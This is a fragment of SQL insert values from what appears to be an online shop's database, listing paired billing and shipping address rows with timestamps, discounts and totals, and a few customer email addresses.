(2017, 1192, '2026-04-28 20:23:57', '2026-04-28 20:23:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2018, 1192, '2026-04-28 20:23:57', '2026-04-28 20:23:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2019, 1193, '2026-04-28 22:48:26', '2026-04-28 22:48:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2020, 1193, '2026-04-28 22:48:26', '2026-04-28 22:48:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2021, 1194, '2026-04-28 22:55:02', '2026-04-28 22:55:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2022, 1194, '2026-04-28 22:55:02', '2026-04-28 22:55:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2023, 1195, '2026-04-29 03:53:17', '2026-04-29 03:53:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2024, 1195, '2026-04-29 03:53:17', '2026-04-29 03:53:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2025, 1196, '2026-04-29 05:12:31', '2026-04-29 05:12:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2026, 1196, '2026-04-29 05:12:31', '2026-04-29 05:12:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2027, 1197, '2026-04-29 06:18:04', '2026-04-29 06:18:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2028, 1197, '2026-04-29 06:18:04', '2026-04-29 06:18:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2029, 1198, '2026-04-29 07:45:19', '2026-04-29 07:45:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2030, 1198, '2026-04-29 07:45:19', '2026-04-29 07:45:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2031, 1199, '2026-04-29 11:27:30', '2026-04-29 11:27:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2032, 1199, '2026-04-29 11:27:30', '2026-04-29 11:27:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2033, 1200, '2026-04-29 14:01:45', '2026-04-29 14:01:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2034, 1200, '2026-04-29 14:01:45', '2026-04-29 14:01:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2035, 1201, '2026-04-29 19:05:14', '2026-04-29 19:05:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2036, 1201, '2026-04-29 19:05:14', '2026-04-29 19:05:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2037, 1202, '2026-04-29 21:32:13', '2026-04-29 21:32:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2038, 1202, '2026-04-29 21:32:13', '2026-04-29 21:32:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2039, 1203, '2026-04-30 02:37:51', '2026-04-30 02:37:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2040, 1203, '2026-04-30 02:37:51', '2026-04-30 02:37:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2041, 1204, '2026-04-30 04:11:26', '2026-04-30 04:11:26', 137, 0, NULL, 'billing', 'e.ko.y.ijavux.uk2.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2042, 1204, '2026-04-30 04:11:26', '2026-04-30 04:11:26', 137, 0, NULL, 'shipping', 'e.ko.y.ijavux.uk2.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2043, 1205, '2026-04-30 05:13:32', '2026-04-30 05:13:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2044, 1205, '2026-04-30 05:13:32', '2026-04-30 05:13:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2045, 1206, '2026-04-30 10:14:04', '2026-04-30 10:14:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2046, 1206, '2026-04-30 10:14:04', '2026-04-30 10:14:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2047, 1207, '2026-04-30 12:59:05', '2026-04-30 12:59:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2048, 1207, '2026-04-30 12:59:05', '2026-04-30 12:59:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2049, 1208, '2026-04-30 17:55:22', '2026-04-30 17:55:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2050, 1208, '2026-04-30 17:55:22', '2026-04-30 17:55:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2051, 1209, '2026-04-30 20:44:20', '2026-04-30 20:44:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2052, 1209, '2026-04-30 20:44:20', '2026-04-30 20:44:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2053, 1210, '2026-04-30 22:07:44', '2026-04-30 22:07:44', 138, 0, NULL, 'billing', 'g.o.q.uqu.y.447@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2054, 1210, '2026-04-30 22:07:44', '2026-04-30 22:07:44', 138, 0, NULL, 'shipping', 'g.o.q.uqu.y.447@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2055, 1211, '2026-05-01 01:17:15', '2026-05-01 01:17:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2056, 1211, '2026-05-01 01:17:15', '2026-05-01 01:17:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2057, 1212, '2026-05-01 04:08:17', '2026-05-01 04:08:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2058, 1212, '2026-05-01 04:08:17', '2026-05-01 04:08:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2059, 1213, '2026-05-01 08:53:23', '2026-05-01 08:53:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2060, 1213, '2026-05-01 08:53:23', '2026-05-01 08:53:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2061, 1214, '2026-05-01 10:39:21', '2026-05-01 10:39:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2062, 1214, '2026-05-01 10:39:21', '2026-05-01 10:39:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1);
